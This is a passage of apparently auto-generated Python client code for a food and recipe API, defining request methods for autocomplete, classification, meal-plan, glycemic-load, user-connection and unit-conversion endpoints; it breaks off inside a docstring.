def autocomplete_ingredient_search(self, query, **kwargs): # noqa: E501
"""Autocomplete Ingredient Search # noqa: E501
Autocomplete the entry of an ingredient. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.autocomplete_ingredient_search(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The partial or full ingredient name. (required)
:param float number: The number of results to return (between 1 and 100).
:param bool meta_information: Whether to return more meta information about the ingredients.
:param str intolerances: A comma-separated list of intolerances. All recipes returned must not contain ingredients that are not suitable for people with the intolerances entered. See a full list of supported intolerances.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.autocomplete_ingredient_search_with_http_info(query, **kwargs) # noqa: E501
else:
(data) = self.autocomplete_ingredient_search_with_http_info(query, **kwargs) # noqa: E501
return data
def autocomplete_ingredient_search_with_http_info(self, query, **kwargs): # noqa: E501
"""Autocomplete Ingredient Search # noqa: E501
Autocomplete the entry of an ingredient. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.autocomplete_ingredient_search_with_http_info(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The partial or full ingredient name. (required)
:param float number: The number of results to return (between 1 and 100).
:param bool meta_information: Whether to return more meta information about the ingredients.
:param str intolerances: A comma-separated list of intolerances. All recipes returned must not contain ingredients that are not suitable for people with the intolerances entered. See a full list of supported intolerances.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['query', 'number', 'meta_information', 'intolerances'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method autocomplete_ingredient_search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'query' is set
if ('query' not in local_var_params or
local_var_params['query'] is None):
raise ApiValueError("Missing the required parameter `query` when calling `autocomplete_ingredient_search`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'query' in local_var_params:
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
if 'meta_information' in local_var_params:
query_params.append(('metaInformation', local_var_params['meta_information'])) # noqa: E501
if 'intolerances' in local_var_params:
query_params.append(('intolerances', local_var_params['intolerances'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/ingredients/autocomplete', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def autocomplete_menu_item_search(self, query, **kwargs): # noqa: E501
"""Autocomplete Menu Item Search # noqa: E501
Generate suggestions for menu items based on a (partial) query. The matches will be found by looking in the title only. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.autocomplete_menu_item_search(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The (partial) search query. (required)
:param float number: The number of results to return (between 1 and 25).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.autocomplete_menu_item_search_with_http_info(query, **kwargs) # noqa: E501
else:
(data) = self.autocomplete_menu_item_search_with_http_info(query, **kwargs) # noqa: E501
return data
def autocomplete_menu_item_search_with_http_info(self, query, **kwargs): # noqa: E501
"""Autocomplete Menu Item Search # noqa: E501
Generate suggestions for menu items based on a (partial) query. The matches will be found by looking in the title only. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.autocomplete_menu_item_search_with_http_info(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The (partial) search query. (required)
:param float number: The number of results to return (between 1 and 25).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['query', 'number'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method autocomplete_menu_item_search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'query' is set
if ('query' not in local_var_params or
local_var_params['query'] is None):
raise ApiValueError("Missing the required parameter `query` when calling `autocomplete_menu_item_search`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'query' in local_var_params:
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/menuItems/suggest', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def autocomplete_product_search(self, query, **kwargs): # noqa: E501
"""Autocomplete Product Search # noqa: E501
Generate suggestions for grocery products based on a (partial) query. The matches will be found by looking in the title only. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.autocomplete_product_search(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The (partial) search query. (required)
:param float number: The number of results to return (between 1 and 25).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.autocomplete_product_search_with_http_info(query, **kwargs) # noqa: E501
else:
(data) = self.autocomplete_product_search_with_http_info(query, **kwargs) # noqa: E501
return data
def autocomplete_product_search_with_http_info(self, query, **kwargs): # noqa: E501
"""Autocomplete Product Search # noqa: E501
Generate suggestions for grocery products based on a (partial) query. The matches will be found by looking in the title only. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.autocomplete_product_search_with_http_info(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The (partial) search query. (required)
:param float number: The number of results to return (between 1 and 25).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['query', 'number'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method autocomplete_product_search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'query' is set
if ('query' not in local_var_params or
local_var_params['query'] is None):
raise ApiValueError("Missing the required parameter `query` when calling `autocomplete_product_search`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'query' in local_var_params:
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/products/suggest', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def autocomplete_recipe_search(self, query, **kwargs): # noqa: E501
"""Autocomplete Recipe Search # noqa: E501
Autocomplete a partial input to suggest possible recipe names. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.autocomplete_recipe_search(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The query to be autocompleted. (required)
:param float number: The number of results to return (between 1 and 25).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.autocomplete_recipe_search_with_http_info(query, **kwargs) # noqa: E501
else:
(data) = self.autocomplete_recipe_search_with_http_info(query, **kwargs) # noqa: E501
return data
def autocomplete_recipe_search_with_http_info(self, query, **kwargs): # noqa: E501
"""Autocomplete Recipe Search # noqa: E501
Autocomplete a partial input to suggest possible recipe names. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.autocomplete_recipe_search_with_http_info(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The query to be autocompleted. (required)
:param float number: The number of results to return (between 1 and 25).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['query', 'number'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method autocomplete_recipe_search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'query' is set
if ('query' not in local_var_params or
local_var_params['query'] is None):
raise ApiValueError("Missing the required parameter `query` when calling `autocomplete_recipe_search`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'query' in local_var_params:
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/autocomplete', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def classify_cuisine(self, title, ingredient_list, **kwargs): # noqa: E501
"""Classify Cuisine # noqa: E501
Classify the recipe's cuisine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.classify_cuisine(title, ingredient_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str title: The title of the recipe. (required)
:param str ingredient_list: The ingredient list of the recipe, one ingredient per line (separate lines with \\\\n). (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.classify_cuisine_with_http_info(title, ingredient_list, **kwargs) # noqa: E501
else:
(data) = self.classify_cuisine_with_http_info(title, ingredient_list, **kwargs) # noqa: E501
return data
def classify_cuisine_with_http_info(self, title, ingredient_list, **kwargs): # noqa: E501
"""Classify Cuisine # noqa: E501
Classify the recipe's cuisine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.classify_cuisine_with_http_info(title, ingredient_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str title: The title of the recipe. (required)
:param str ingredient_list: The ingredient list of the recipe, one ingredient per line (separate lines with \\\\n). (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['title', 'ingredient_list'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method classify_cuisine" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'title' is set
if ('title' not in local_var_params or
local_var_params['title'] is None):
raise ApiValueError("Missing the required parameter `title` when calling `classify_cuisine`") # noqa: E501
# verify the required parameter 'ingredient_list' is set
if ('ingredient_list' not in local_var_params or
local_var_params['ingredient_list'] is None):
raise ApiValueError("Missing the required parameter `ingredient_list` when calling `classify_cuisine`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'title' in local_var_params:
form_params.append(('title', local_var_params['title'])) # noqa: E501
if 'ingredient_list' in local_var_params:
form_params.append(('ingredientList', local_var_params['ingredient_list'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/cuisine', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def classify_grocery_product(self, inline_object9, **kwargs): # noqa: E501
"""Classify Grocery Product # noqa: E501
This endpoint allows you to match a packaged food to a basic category, e.g. a specific brand of milk to the category milk. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.classify_grocery_product(inline_object9, async_req=True)
>>> result = thread.get()
:param async_req bool
:param InlineObject9 inline_object9: (required)
:param str locale: The display name of the returned category, supported is en_US (for American English) and en_GB (for British English).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.classify_grocery_product_with_http_info(inline_object9, **kwargs) # noqa: E501
else:
(data) = self.classify_grocery_product_with_http_info(inline_object9, **kwargs) # noqa: E501
return data
def classify_grocery_product_with_http_info(self, inline_object9, **kwargs): # noqa: E501
"""Classify Grocery Product # noqa: E501
This endpoint allows you to match a packaged food to a basic category, e.g. a specific brand of milk to the category milk. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.classify_grocery_product_with_http_info(inline_object9, async_req=True)
>>> result = thread.get()
:param async_req bool
:param InlineObject9 inline_object9: (required)
:param str locale: The display name of the returned category, supported is en_US (for American English) and en_GB (for British English).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['inline_object9', 'locale'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method classify_grocery_product" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'inline_object9' is set
if ('inline_object9' not in local_var_params or
local_var_params['inline_object9'] is None):
raise ApiValueError("Missing the required parameter `inline_object9` when calling `classify_grocery_product`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'locale' in local_var_params:
query_params.append(('locale', local_var_params['locale'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'inline_object9' in local_var_params:
body_params = local_var_params['inline_object9']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/products/classify', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def classify_grocery_product_bulk(self, request_body, **kwargs): # noqa: E501
"""Classify Grocery Product Bulk # noqa: E501
Provide a set of product jsons, get back classified products. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.classify_grocery_product_bulk(request_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[object] request_body: (required)
:param str locale: The display name of the returned category, supported is en_US (for American English) and en_GB (for British English).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.classify_grocery_product_bulk_with_http_info(request_body, **kwargs) # noqa: E501
else:
(data) = self.classify_grocery_product_bulk_with_http_info(request_body, **kwargs) # noqa: E501
return data
def classify_grocery_product_bulk_with_http_info(self, request_body, **kwargs): # noqa: E501
"""Classify Grocery Product Bulk # noqa: E501
Provide a set of product jsons, get back classified products. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.classify_grocery_product_bulk_with_http_info(request_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[object] request_body: (required)
:param str locale: The display name of the returned category, supported is en_US (for American English) and en_GB (for British English).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['request_body', 'locale'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method classify_grocery_product_bulk" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'request_body' is set
if ('request_body' not in local_var_params or
local_var_params['request_body'] is None):
raise ApiValueError("Missing the required parameter `request_body` when calling `classify_grocery_product_bulk`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'locale' in local_var_params:
query_params.append(('locale', local_var_params['locale'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'request_body' in local_var_params:
body_params = local_var_params['request_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/products/classifyBatch', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def clear_meal_plan_day(self, username, date, hash, inline_object10, **kwargs): # noqa: E501
"""Clear Meal Plan Day # noqa: E501
Delete all planned items from the user's meal plan for a specific day. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.clear_meal_plan_day(username, date, hash, inline_object10, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param str date: The date in the format yyyy-mm-dd. (required)
:param str hash: The private hash for the username. (required)
:param InlineObject10 inline_object10: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.clear_meal_plan_day_with_http_info(username, date, hash, inline_object10, **kwargs) # noqa: E501
else:
(data) = self.clear_meal_plan_day_with_http_info(username, date, hash, inline_object10, **kwargs) # noqa: E501
return data
def clear_meal_plan_day_with_http_info(self, username, date, hash, inline_object10, **kwargs): # noqa: E501
"""Clear Meal Plan Day # noqa: E501
Delete all planned items from the user's meal plan for a specific day. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.clear_meal_plan_day_with_http_info(username, date, hash, inline_object10, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param str date: The date in the format yyyy-mm-dd. (required)
:param str hash: The private hash for the username. (required)
:param InlineObject10 inline_object10: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['username', 'date', 'hash', 'inline_object10'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method clear_meal_plan_day" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'username' is set
if ('username' not in local_var_params or
local_var_params['username'] is None):
raise ApiValueError("Missing the required parameter `username` when calling `clear_meal_plan_day`") # noqa: E501
# verify the required parameter 'date' is set
if ('date' not in local_var_params or
local_var_params['date'] is None):
raise ApiValueError("Missing the required parameter `date` when calling `clear_meal_plan_day`") # noqa: E501
# verify the required parameter 'hash' is set
if ('hash' not in local_var_params or
local_var_params['hash'] is None):
raise ApiValueError("Missing the required parameter `hash` when calling `clear_meal_plan_day`") # noqa: E501
# verify the required parameter 'inline_object10' is set
if ('inline_object10' not in local_var_params or
local_var_params['inline_object10'] is None):
raise ApiValueError("Missing the required parameter `inline_object10` when calling `clear_meal_plan_day`") # noqa: E501
collection_formats = {}
path_params = {}
if 'username' in local_var_params:
path_params['username'] = local_var_params['username'] # noqa: E501
if 'date' in local_var_params:
path_params['date'] = local_var_params['date'] # noqa: E501
query_params = []
if 'hash' in local_var_params:
query_params.append(('hash', local_var_params['hash'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'inline_object10' in local_var_params:
body_params = local_var_params['inline_object10']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/mealplanner/{username}/day/{date}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def compute_glycemic_load(self, body, **kwargs): # noqa: E501
"""Compute Glycemic Load # noqa: E501
Retrieve the glycemic index for a list of ingredients and compute the individual and total glycemic load. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.compute_glycemic_load(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object body: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.compute_glycemic_load_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.compute_glycemic_load_with_http_info(body, **kwargs) # noqa: E501
return data
def compute_glycemic_load_with_http_info(self, body, **kwargs): # noqa: E501
"""Compute Glycemic Load # noqa: E501
Retrieve the glycemic index for a list of ingredients and compute the individual and total glycemic load. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.compute_glycemic_load_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object body: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method compute_glycemic_load" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in local_var_params or
local_var_params['body'] is None):
raise ApiValueError("Missing the required parameter `body` when calling `compute_glycemic_load`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/ingredients/glycemicLoad', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def connect_user(self, body, **kwargs): # noqa: E501
"""Connect User # noqa: E501
In order to call user-specific endpoints, you need to connect your app's users to spoonacular users. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.connect_user(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object body: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.connect_user_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.connect_user_with_http_info(body, **kwargs) # noqa: E501
return data
def connect_user_with_http_info(self, body, **kwargs): # noqa: E501
"""Connect User # noqa: E501
In order to call user-specific endpoints, you need to connect your app's users to spoonacular users. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.connect_user_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object body: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method connect_user" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in local_var_params or
local_var_params['body'] is None):
raise ApiValueError("Missing the required parameter `body` when calling `connect_user`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/users/connect', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def convert_amounts(self, ingredient_name, source_amount, source_unit, target_unit, **kwargs): # noqa: E501
"""Convert Amounts # noqa: E501
Convert amounts like \"2 cups of flour to grams\". # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.convert_amounts(ingredient_name, source_amount, source_unit, target_unit, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ingredient_name: The ingredient which you want to convert. (required)
:param float source_amount: The amount from which you want to convert, e.g. the 2.5 in \"2.5 cups of flour to grams\". (required)
:param str source_unit: The unit from which you want to convert, e.g. the grams in \"2.5 cups of flour to grams\". You can also use \"piece\", e.g. \"3.4 oz tomatoes to piece\" (required)
:param str target_unit: The unit to which you want to convert, e.g. the grams in \"2.5 cups of flour to grams\". You can also use \"piece\", e.g. \"3.4 oz tomatoes to piece\" (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.convert_amounts_with_http_info(ingredient_name, source_amount, source_unit, target_unit, **kwargs) # noqa: E501
else:
(data) = self.convert_amounts_with_http_info(ingredient_name, source_amount, source_unit, target_unit, **kwargs) # noqa: E501
return data
def convert_amounts_with_http_info(self, ingredient_name, source_amount, source_unit, target_unit, **kwargs): # noqa: E501
"""Convert Amounts # noqa: E501
Convert amounts like \"2 cups of flour to grams\". # noqa: E501
This method makes a synchronous HTTP request by default. To make an
